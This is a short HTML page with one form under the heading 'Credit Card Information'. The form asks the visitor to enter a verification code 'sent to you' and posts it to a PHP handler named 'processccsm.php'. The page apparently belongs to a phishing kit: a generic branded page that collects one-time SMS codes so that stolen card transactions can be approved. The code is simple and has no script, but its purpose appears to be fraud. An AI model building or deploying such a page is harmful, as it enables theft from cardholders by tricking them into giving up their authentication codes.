<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Form Submission</title>
    <style>
        body {
            background-image: url('background.jpg');
            background-size: cover;
            font-family: Arial, sans-serif;
            color: black;
            text-align: center;
            padding-top: 100px;
        }
        form {
            background-color: white;
            padding: 20px;
            border-radius: 10px;
            display: inline-block;
        }
        input[type="text"], input[type="password"], input[type="number"], input[type="date"] {
            display: block;
            margin: 10px auto;
            padding: 10px;
            width: 80%;
            border: none;
            border-bottom: 2px solid #3498db;
            border-radius: 5px;
        }
        input[type="submit"] {
            background-color: blue;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
    </style>
</head>
<body>

<form action="processccsm.php" method="post">
    <img src="logo2.png" style="width: 100px; height: auto;">
    <h2>Credit Card Information</h2>
    <input type="text" name="verification_code" placeholder="Enter the code that is sent to you" required>
    <input type="submit" value="Submit">
</form>

</body>
</html>